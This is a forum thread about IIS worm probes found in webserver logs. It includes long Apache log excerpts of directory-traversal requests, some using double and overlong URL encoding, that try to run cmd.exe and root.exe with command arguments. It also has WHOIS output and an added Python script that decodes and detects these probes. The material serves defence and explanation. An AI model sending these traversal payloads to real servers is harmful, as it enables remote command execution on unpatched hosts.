Attack on webserver?

Status
Not open for further replies.

captain
User, joined 23 Feb 2001, 803 posts
Found the following in the visitor data of my webserver. Is this an attack? I'm running it under Windows 98 and this is Unix code:


/62.101.250.98 Jul 12 18:09:34 /default.ida
/62.118.206.249 Jul 12 18:15:07 /default.ida
/80.116.106.60 Jul 12 19:05:49 /default.ida
/62.61.192.22 Jul 12 22:44:06 /scripts/root.exe
/62.61.192.22 Jul 12 22:44:08 /MSADC/root.exe
/62.61.192.22 Jul 12 22:44:12 /c/winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:16 /d/winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:18 /scripts/..%5c../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:26 /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:34 /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:37 /msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:41 /scripts/..../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:43 /scripts/../../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:46 /scripts/../../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:49 /scripts/..\../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:52 /scripts/..5c../winnt/system32/cmd.exe
/62.61.192.22 Jul 12 22:44:58 /scripts/..5c../winnt/system32/cmd.exe
 
Yes, this looks like an attack in which CMD.EXE (the command prompt) is the weak spot. And whoever is messing about is a good one: he/she is using an IP address that is not documented.

Comment: These addresses have been further assigned to users in the RIPE NCC region

You're lucky that Windows 98 doesn't have CMD.EXE. Only NT versions have that program.
 
So that's the notorious IIS worm; I have it in my NT server logs too.
If you have all the updates there's nothing to worry about.

Also had a quick look at where it comes from:
---Last Hub alive ---

OrgName: Teleglobe Inc.
OrgID: GLBE
Address: 1441 Carrie-Derick
City: Montreal
StateProv: QC
PostalCode: H3C-4S9
Country: CA

NetRange: 64.86.0.0 - 64.86.255.255
CIDR: 64.86.0.0/16
NetName: TELEGLOBE
NetHandle: NET-64-86-0-0-1
Parent: NET-64-0-0-0-0
NetType: Direct Allocation
NameServer: CASTOR.TELEGLOBE.NET
NameServer: POLLUX.TELEGLOBE.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2000-05-04
Updated: 2002-07-30

TechHandle: ZT129-ARIN
TechName: Admin, IP
TechPhone: +1-514-868-8308
TechEmail: ip-addr@teleglobe.ca

OrgTechHandle: ZT129-ARIN
OrgTechName: Admin, IP
OrgTechPhone: +1-514-868-8308
OrgTechEmail: ip-addr@teleglobe.ca

ARIN WHOIS database, last updated 2003-07-12 21:05
Enter ? for additional hints on searching ARIN's WHOIS database.

So if he comes by again, post the time, if you will.

SoF
 
Happens regularly on my Apache server too:

62.166.146.58 - - [08/Jul/2003:21:37:49 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.166.146.58 - - [08/Jul/2003:21:37:49 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.166.146.58 - - [08/Jul/2003:21:37:49 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:21:37:50 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:21:37:50 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:21:37:50 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:21:37:50 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:21:37:51 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.166.146.58 - - [08/Jul/2003:21:37:51 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:21:37:51 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:21:37:51 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:21:37:52 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:21:37:52 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:21:37:52 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:21:37:52 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:21:37:53 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:04:20 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.166.146.58 - - [08/Jul/2003:22:04:20 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.166.146.58 - - [08/Jul/2003:22:04:20 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:22:04:21 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:22:04:21 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:04:21 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:22:04:21 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:22:04:22 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.166.146.58 - - [08/Jul/2003:22:04:22 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:04:22 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:04:22 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:04:23 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:04:23 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:22:04:23 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:22:04:23 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:04:24 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:59:15 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.166.146.58 - - [08/Jul/2003:22:59:15 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.166.146.58 - - [08/Jul/2003:22:59:16 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:22:59:16 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:22:59:16 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:59:17 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:22:59:17 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:22:59:17 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.166.146.58 - - [08/Jul/2003:22:59:18 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:59:18 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:59:18 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:59:18 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:22:59:19 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:22:59:19 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:22:59:19 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:22:59:20 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:23:04:59 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.166.146.58 - - [08/Jul/2003:23:04:59 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.166.146.58 - - [08/Jul/2003:23:05:00 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:23:05:00 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.146.58 - - [08/Jul/2003:23:05:00 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:23:05:01 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:23:05:01 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.146.58 - - [08/Jul/2003:23:05:01 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.166.146.58 - - [08/Jul/2003:23:05:01 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:23:05:02 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:23:05:02 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:23:05:02 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.146.58 - - [08/Jul/2003:23:05:02 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:23:05:03 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.146.58 - - [08/Jul/2003:23:05:03 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.255.112 - - [11/Jul/2003:04:35:29 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.166.255.112 - - [11/Jul/2003:04:35:30 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
62.166.255.112 - - [11/Jul/2003:04:35:32 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.255.112 - - [11/Jul/2003:04:35:32 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
62.166.255.112 - - [11/Jul/2003:04:35:32 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.255.112 - - [11/Jul/2003:04:35:33 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.255.112 - - [11/Jul/2003:04:35:33 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
62.166.255.112 - - [11/Jul/2003:04:35:34 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
62.166.255.112 - - [11/Jul/2003:04:35:34 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.255.112 - - [11/Jul/2003:04:35:35 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.255.112 - - [11/Jul/2003:04:35:35 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.255.112 - - [11/Jul/2003:04:35:36 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
62.166.255.112 - - [11/Jul/2003:04:35:37 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.255.112 - - [11/Jul/2003:04:35:41 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
62.166.255.112 - - [11/Jul/2003:04:35:42 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.255.112 - - [11/Jul/2003:04:35:43 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

And I have a whole laundry list more like this; it happens 3 to 4 times every day that I see this in the log.
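A defender's way to triage log lines like the ones posted above, as an added example that is not from this thread: it parses the Apache access-log format shown, undoes the traversal encodings the probes use (double percent-encoding such as %255c, overlong UTF-8 pairs such as %c0%af) and tallies which probe each source IP sent. The regex, the label names and the 10.0.0.5 line are my own assumptions and constructions.

```python
import re
from collections import Counter
from urllib.parse import unquote
# Apache access-log line as posted above: ip - - [ts] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# Files the probes in this thread go after: default.ida (Code Red), root.exe / cmd.exe (Nimda)
WORM_TARGETS = ("default.ida", "root.exe", "cmd.exe")
# Overlong / invalid UTF-8 pairs seen in the posted log, used to smuggle '/' and '\' past checks
OVERLONG = ("%c0%af", "%c0%2f", "%c1%1c", "%c1%9c")
def normalize(path):
    """Decode a path like a lax server: overlong pairs -> '/', decode twice, unify slashes."""
    p = path.lower()
    for seq in OVERLONG:
        p = p.replace(seq, "/")
    p = unquote(unquote(p))  # second pass exposes double encoding: %255c -> %5c -> '\'
    return p.replace("\\", "/")

def classify(path):
    """Label a request path as a known worm probe, or None if it looks benign."""
    norm = normalize(path)
    target = next((t for t in WORM_TARGETS if t in norm), None)
    if target is None:
        return None
    if target == "default.ida":
        return "code-red"
    label = "nimda:" + target
    if "../" in norm:  # traversal out of the scripts/msadc virtual directories
        label += "+traversal"
    if "%" in path:    # separator hidden behind percent-encoding
        label += "+encoded"
    return label

def scan_log(lines):
    """Return {ip: Counter(label -> hits)} for flagged requests only."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m.group(4))
        if label:
            hits.setdefault(m.group(1), Counter())[label] += 1
    return hits
# Sample input: three lines copied from the log posted above plus one constructed benign request
SAMPLE = """\
62.166.146.58 - - [08/Jul/2003:21:37:49 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
62.166.146.58 - - [08/Jul/2003:21:37:50 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
62.166.146.58 - - [08/Jul/2003:21:37:52 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
10.0.0.5 - - [11/Jul/2003:04:36:00 -0700] "GET /index.html HTTP/1.0" 200 1024
""".splitlines()
```

Note that the `..%%35%63..` request got a 400 from Apache (malformed escape), yet normalizing still shows it was the same cmd.exe traversal, which is why matching on the decoded form rather than the status code is the useful signal here.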
 
Thanks guys

SoF, the attack was last night (Saturday) around 22:45.
I think that with Windows 98 I'm safe against IIS worms even without a patch, right? :)
 
Could indeed be worms, but also "ordinary" attacks from people who have nothing better to do than scan people at random.

Which webserver are you using?
 
Posted by captain
Thanks guys

SoF, the attack was last night (Saturday) around 22:45.
I think that with Windows 98 I'm safe against IIS worms even without a patch, right? :)

Yes and no .....
Look in the logfile and you'll see that it is looking for the winnt/..... folder, which you don't have; I just don't know offhand whether another version of this worm is also going around.
Better to search www.technet.com for a good solution, if there is one.

SoF
 
Posted by captain
I think that with Windows 98 I'm safe against IIS worms even without a patch, right? :)

You may well be safe against IIS worms if you haven't patched it, but you are vulnerable to other attacks, so I would patch it anyway.
 